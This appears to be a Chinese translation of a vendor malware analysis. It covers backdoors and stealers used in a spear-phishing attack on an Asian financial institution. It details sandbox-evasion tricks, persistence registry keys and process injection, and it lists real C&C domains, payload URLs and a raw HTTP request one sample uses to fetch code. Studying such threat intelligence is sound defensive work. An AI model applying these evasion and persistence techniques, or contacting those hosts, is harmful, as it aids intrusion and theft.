source:http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-institution/

0x00 前言


近來, Cyphort Labs已收到多種針對于亞洲某金融機構的惡意軟件,由于某進行中的研究,我們將匿名該公司.

來源已經表明,攻擊的起始入口為其中一名雇員打開了某收到的魚叉式釣魚郵件,攻擊涉及到了多種后門和用于竊取信息的木馬。一些惡意軟件具有反沙盒屬性且含有對抗heuristic signatures(一般被反病毒公司使用)的保護.多種惡意軟件樣本也展示了某種一般性的主題,例如:將自身安裝到%ProgramFiles%%UserProfile%文件夾(取決于用戶是否有admin特權)中.此外,多數的惡意軟件樣本是用Borland Delphi編譯的,它們帶有已加密的字符串和API字符串(被混淆或被分為多個字符串)作為保護以對抗heuristic signatures技術.除了某個樣本外,其它樣本都沒被加殼。

以文件的創建日期為根據,它的出現早于2015年2月,并已持續了三個多月

enter image description here

在該攻擊中使用的樣本概要

技術分析

enter image description here

enter image description here

0x01 技術分析


GoogleUpdate.exe

今天,流行的惡意軟件中,文件的文件結構通常并不像我們看到的那樣.為什么?因為在今天,多數AV產品部署了基于啟發式的檢測技術(檢測加殼樣本和某些具有非常規文件結構的樣本).該惡意軟件沒被加殼且區段類似于某正常文件.

被加密的字符串只在被使用前解密.惡意軟件通常將其API字符串分為多個字符串.這也為了躲避heuristic signatures(檢測字符串和可疑APIs).

enter image description here

如果用戶有admin特權,則它將其自身副本移動到%Pr0gramFiles%文件夾中.如果不是則不移動 如果具有admin特權:

%ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

如果不具有admin特權:

%UserProfile%\Applications\GoogleUpdate.exe

它作為某種服務(帶有”SENSS”服務名)安裝自身.

enter image description here

在檢查(它是否成功作為某種服務在運行)之后,檢查父進程是否為explorer.exe或iexplore.exe.該dll被加密(通過XOR 0x89作為密鑰)

反沙盒

檢測Sleep加速功能

為了挫敗沙盒,該惡意軟件憑借sleeps或loops拖延惡意軟件的執行,因為他知道某沙盒系統將會在限制的短時間內執行惡意軟件.

通過對比,一旦位于你的系統內,惡意軟件將有大量時間來實現它的惡意意圖。為了挫敗該保護,沙盒系統部署了加速功能, 即如果他們檢測到某樣本使用某種延遲技術,它將加速該樣本的執行.例如,如果它檢測到該樣本sleeps一分鐘那么該系統將其改為sleeps 1秒。不幸的是, 對該惡意軟件來說,這種技術已經不起作用了.該惡意軟件可通過發布某個sleep以檢測到sleep的加速,之后在得到消逝時間的同時檢查消逝的時間是否比sleep的時間短

enter image description here

檢測API鉤子

沙盒系統也會鉤住APIs以監控某文件操作.該惡意軟件通過檢查某API的第一條指令是否為jmp,call或一push-retn來檢測鉤子.它檢查某API地址的起始字節是否為如下字節:

  • E8
  • E9
  • EB
  • FF
  • 68????????C3 (push retn)

enter image description here

Payload

被注入的代碼是某后門,它被用于與如下C&C服務器通信:

bbs.gokickes.com:80
img.lifesolves.com:8080
domain.gokickes.com:443

取決于后門中的命令,該惡意軟件有如下功能:

下載并執行額外的文件

enter image description here

捕獲屏幕截圖
捕獲鼠標和鍵盤事件記錄

enter image description here

更新自身
打開遠程shell
終止進程
枚舉網絡共享
枚舉驅動器
卸載自身
最后所有被發送和服務器中接收的數據用0xd5進行異或操作實現加密

enter image description here

mslives.exe

該樣本與GoogleUpdate.exe有類似的文件結構.但是它沒有部署類似的反沙盒功能.

運行第一次時,在進行它的安裝計劃前將sleeps300秒。之后,如下所示它創建某自身副本

%ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

然而,該副本的文件末尾寫入了大量垃圾數據,它的大小比自身大小大了100MB。它將對該文件進行1000次的寫入100KB操作.為避開沙盒這里做了兩件事.首先,該惡意軟件不創建自身副本(讓該惡意軟件的行為不尋常并出現 使該惡意軟件行為不尋常并可能因有利操作而出現于沙盒.通常惡意軟件操作是為了創建某確切的自身副本。其次,多次寫操作事件可能超過沙盒的限制.釋放的文件副本的大小讓沙盒可信任

enter image description here

它用CreateProcess執行它的副本接著檢查是否作為Iexplore.exe運行,如果不是,它將創建一個被掛起的iexplore.exe進程并將它的代碼通過覆蓋iexplore.exe的主模塊的方式注入其中, 它創建隱藏的windows窗口名和類名“111111”, 然后創建一自啟動注冊表入口如下(讓其在每次機器啟動時自動啟動)

HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
  Valuue: msliveupdate
  Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

Payload

該樣本只有一個目的,該目的是下載并執行從?forum.energymice.com.中下載的文件

GET /view/login.asp HTTP/1.1
Content-Type: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)
Host: forum.energymice.com
Cache-Control: no-cache

將下載的文件放入%TEMP%文件夾中并執行它.不幸的是,在我們分析的同時,用于下載的URL沒返回任何程序

enter image description here

winhost.exe


不想其它文件,該文件明顯被加殼了.PEID識別殼如下:

ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

該文件是一個命名為”HDOOR”的后門因為我們在其自身發現的該字符串。我們也發現其它有趣的字符串(指明被使用的保護程序)

HDoor, Version 1.0
Copyright (C) 2013
(c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

該后門監聽143端口并等待客戶端連接和發布命令.143端口是默認的IMAP non-encrypted端口IMAP或(因特網信息通道協議)是郵箱協議的一種(被使用于某本地客戶端上訪問位于遠程web服務器的電子郵箱.

enter image description here

它檢查用戶是否有admin特權.如果用戶有admin特權,它將作為某服務安裝自身并將其副本存放在如下目錄:

%ProgramFiles%\Common Files\System\NT\lib\winhost.exe

如果用戶沒有admin特權,將如下安裝自身并在注冊表中構造一個自啟動鍵入口

%USERPROFILE%\System\winhost.exe

自啟動注冊表如下:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
  Value: Microsoft Messenger
  Data: %USERPROFILE%\System\winhost.exe

? Payload

enter image description here

它有能力執行如下操作(取決于攻擊者的命令)。

  • 斷開連接
  • 得到后門的安裝路徑
  • 列出文件或目錄
  • 輸入某txt文件的內容
  • 執行某程序
  • 下載某文件
  • 得到某CMDShell
  • 退出某CMDShell
  • 上傳某文件
  • 下載某個文件
  • 加載 dll 庫
  • 釋放 dll 庫

nethost.exe


安裝它自身副本位置取決于用戶是否有admin特權:

如果用戶有admin特權:

%ProgramFiles% \common files\system\library\nethost.exe

作為某種服務安裝自身:

HKLM\System\CurrentControlSet\Services\ncoglsse 
DisplayName = Microsoft Wireless Device Service
ImagePath =?%ProgramFiles% \common files\system\library\nethost.exe

如果沒有admin特權:

%USERPROFILE% \system\library\nethost.exe

構造如下自啟動鍵

HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
Value: “ncoglsse”
Data: %ProgramFiles%\common files\system\library\nethost.exe

在安裝之后,它將被注入到lsass.exe以駐存于內存并執行它的payload.

Payload

從如下URLs中下載

http://hud321.astringer.com/images/log.gif
http://grop.waterglue.org/images/logg.gif
http://hud.astringer.com/images/log.gif

被下載的文件內容是被加密的URLs(用它以連接到其C&C).惡意軟件用HTTP POST連接到該URL并發送如下信息。

  • IP 地址
  • Language ID
  • 惡意軟件的版本
  • 操作系統的版本
  • 機器名

它從C&C中接收命令且有能力做到如下:

在你PC上收集關于驅動器和文件夾的信息
列出文件

enter image description here

下載文件
終止文件
打開 CMD shell

enter image description here

Shell64.dll ?

Shell64_u.dll-加載器組件?加載器組建被當作某種服務運行,加載組件并確保完全感染.服務,包括服務名(通過惡意軟件釋放程序來配置,它在編寫時是不可知的.字符串被嵌入于加載器組件(促成程序用Dyamar保護程序加殼),但二進制程序沒有留下徹底被保護的痕跡.

通過宏和大量的混淆字符串促成簡明的混淆元素,表明該行為試圖讓分析變得更復雜但它可輕易被繞過.同時程序也由三部分假輸出構成,展示了更多的混淆元素.有趣的是,程序保留一個日志文件,定位于C:\debug.txt,該位置被寫入調試信息.

ServiceMan將直接執行某導出表,或是低于Windows操作系統6.0版本的loadFunc或是6.0及以上版本的win7load.表明導出表加載間諜組件,通過某個彈出的rundll32.exe進程(帶有有根據的參數集).第二個二進制程序導出兩個函數,’main‘和’lowmain‘,它再次兼容6.0上下的操作系統版本.

enter image description here

Shell64.dll –間諜組件


該組件由內部名為’Server.dll’模塊構成.它導出‘main’ 和‘lowmain函數,main函數服務于6.0及以上的操作系統版本,lowmain服務于6.0以下的操作系統版本.僅像加載器組件那樣,該二進制程序創建并持有C:\debug.txt文件(寫入被調試的信息)

在啟動shell64.dll期間創建某命名為mutext的文件,稱號為Global\KongQi[TickCount],TickCount的位置實時記錄感染次數。同時惡意軟件創建某個命名為view的進程,他被使用于在線程和介入的進程間交換運行時信息,稱號為’_kaspersky’.選擇該稱號毫無疑問是為了提高竊取的隱蔽性

enter image description here

在啟動惡意軟件期間,它獲取關于被感染系統的信息并將其發到它的遠程服務器。信息包括:

主機名
系統cpu電源
操作系統版本
Drive geometry for PHYSICALDRIVE0
全局內存狀態
視頻捕獲驅動的描述信息
進程列表中正運行的安全產品
枚舉安全產品

如下列表所示為: 搜索到的安全產品

enter image description here

enter image description here

enter image description here

如下為被枚舉到的防火墻安裝情況

Norton Personal Firewall ???????
ZoneAlarm ??????????????????????
Comodo Firewall ????????????????
eTrust EZ Firewall ?????????????
F-Secure Internet Security ?????
McAfee Personal Firewall ???????
Outpost Personal Firewall ??????
Panda Internet Seciruty Suite ??
Panda Anti-Virus/Firewall ??????
BitDefnder/Bull Guard Antivirus
Rising Firewall ????????????????
360Safe AntiArp

間諜功能


一旦惡意軟件完成部署,則等待接收來自遠程服務器的指令.它的功能相當多,且被設計來在被感染系統中竊取數據.用deflare算法壓縮被竊取的信息并將其發送到某遠程服務器.如下為分析出的函數列表:

  • Video Captures使用某命名為CVideoCap的捕獲窗口,壓縮視頻時使用Windows VCM API(視頻壓縮管理器)
  • 從系統的聲音輸入設備中捕獲信息,如麥克風
  • 從當前桌面的粘貼板竊取數據,他可從密碼管理器中提取密碼
  • 捕獲截圖并壓縮它們,作為某數據流潛逃
  • 樣本含有某用戶態鍵盤記錄器,通過SetWindowsHookEx設置全局windows鉤子以監聽鍵盤事件,它通過Windows IMM API(Input Method Manager)解析;鍵擊記錄被轉儲到某’jpjl.dat’文件中
  • 清理事件日志(’應用‘,’安全‘,’系統‘),一般是為了擦除某次入侵的取證證據.
  • 關閉系統,意外強制重啟
  • 創建某本地用戶名的描述‘This user account is used by the Visual Studio .NET Debugger’
  • 下載文件并執行它們
  • 執行硬盤中其他的二進制程序
  • 在系統上枚舉文件和文件屬性,修改并刪除文件和目錄
  • 枚舉已打開程序的窗口名
  • 枚舉系統屬性如操作系統版本,cpu電源或硬盤的內存容量,系統運行時間,處理器數,機器上運行中的安全產品的進程名,計算機名,當前用戶的用戶名,已附加的驅動器.

enter image description here

  • 枚舉dial-up連接參數,例如電話號碼和設備名
  • 開啟終端服務并允許遠程連接
  • 彈出消息窗口
  • 開啟某socket來發送并接收數據

刪除它的文件并持續機器中的某機制,等等.卸載服務并移除某自啟動注冊表(位于[HKLM]\..\CurrentVersion\Run named ‘MSLiveMessenger’ );這是不易理解的想法,創建該鍵的方法可從如下鏈接中了解到: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-institution/#sthash.O2q4UOUI.dpuf

持續性手段

設計二進制程序以在Windows服務的上下文內運行,假定通過某釋放程序搭建.服務名也不明確,因為它是由釋放程序設置的.然而,惡意軟件的功能有: 將其payload注入到遠程進程并含有注入到winlogon.exe的函數(在Windows6.0之前的版本中)

dllhost.exe

該惡意軟件不會做更多事.它僅試圖從blog.softfix.co.kr:80下載東西

enter image description here

0x02 幕后是誰?


使用C&C服務器的攻擊者在韓國注冊的注冊記錄看起來是偽造的.多數C&C服務器也擁有hugedomains.com,該公司之前售賣擁有的域名和隱藏信息服務.我們也可以意識到字符串位于二進制程序中,它顯然不是來自本地的

C&C使用的whois記錄如下

bbs.gokickes.com:80, domain.gokickes.com:443 (GoogleUpdate.exe)

Emails [email protected] (a, t, r)
Names smith jack (a, t, r)
Organizations ????
Streets seoul, korea (a, t, r)
Cities seoul (a, t, r)
States seoul (a, t, r)
Postals 158070 (a, t, r)
Countries KR (a, t, r)
Phones 8245896312 (a, t, r)

img.lifesolves.com:8080 (GoogleUpdate.exe)

Emails [email protected] (a, t, r)
Names zhang yunqiang (a, t, r)
Organizations ????
Streets Taiping Road (a, t, r)
Cities seoul (a, t, r)
States seoul (a, t, r)
Postals 100-744 (a, t, r)
Countries KR (a, t, r)
Phones 82527656289 (a, t, r)

softfix.co.kr (dllhost.exe)

Registrant ?????????????????: gson
Administrative Contact(AC) ?: zhang yunqiang
AC E-Mail ??????????????????: [email protected]
Registered Date ????????????: 2014. 01. 08.
Last Updated Date ??????????: 2014. 01. 08.
Expiration Date ????????????: 2016. 01. 08.
Publishes ??????????????????: N
Authorized Agency ??????????: Gabia, Inc.(http://www.gabia.co.kr)
DNSSEC ?????????????????????: unsigned

diskoco.com (mpsvc.exe)

Registrant Name:yang qi
Registrant Organization:yang qi
Registrant Street:Guancheng District No126
Registrant City:dong guan
Registrant State/Province:Guangdong
Registrant Postal Code:523000
Registrant Country:China
Registrant Phone:+86.0769 89098138
Registrant Phone Ext:
Registrant Fax:+86.0769 89098200
Registrant Fax Ext:
Registrant Email:[email protected]

forum.energymice.com (mslives.exe)

Registrant Name: Domain Admin
Registrant Organization: HugeDomains.com
Registrant Street: 2635 Walnut Street
Registrant City: Denver
Registrant State/Province: CO
Registrant Postal Code: 80205
Registrant Country: US
Registrant Phone: +1.303.893.0552
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]

astringer.com (nethost.exe)

Registrant Name: Domain Admin / This Domain is For Sale
Registrant Organization: HugeDomains.com
Registrant Street: 2635 Walnut Street
Registrant City: Denver
Registrant State/Province: CO
Registrant Postal Code: 80205
Registrant Country: US
Registrant Phone: +1.303.893.0552
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]

waterglue.org

Registrant Name:Registration Private
Registrant Organization:Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14747 N Northsight Blvd Suite 111, PMB 309
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email:[email protected]

0x03 結論


惡意軟件無需變得高級

這些惡意軟件不高級,同時它們是惡意軟件的家族成員,我們在之前看到它們也能繞過安全檢測.惡意軟件駐存了長達三個月的時間(給予攻擊者充分的時間進行操作).這證明了惡意軟件不必高級也能完成任務

使用AV仍是我們最好的防御手段,他們隔離主要的安全事件,因為有太多惡意軟件的攻擊者用多種不同的技術(沒有單一安全解決方案停止這些攻擊).這是我們需要多種安全解決方案的原因,同時,在我們各自的群體中,我們也需要保護人們的安全.

為何進行魚叉式釣魚?

惡意軟件的初始入口是某次魚叉式釣魚(針對前面提到的公司).根據TrendMicro 中的報告,魚叉式攻擊仍然是最常見的APT攻擊手段.報告中表明:“APT活動頻繁使用魚叉式釣魚手段,本質是讓高級階層的目標打開釣魚電子郵件從而拿下目標.

對于攻擊者來說,猜測某組織中的郵箱地址尤其簡單,如果目標是高級階層的官員(由于在線可看到他們的名字).攻擊者可通過在線搜索信息而輕易拿下他們的資料.這使攻擊者可根據目標的資料自定義他們的攻擊行為

這是一則保護我們組織的消息,我們也必須教育并培訓所有在我們組織中的人們(進行安全實戰),以免遭受這些類型的社會工程學攻擊威脅.

您的支持將鼓勵我們繼續創作!

[微信] 掃描二維碼打賞

[支付寶] 掃描二維碼打賞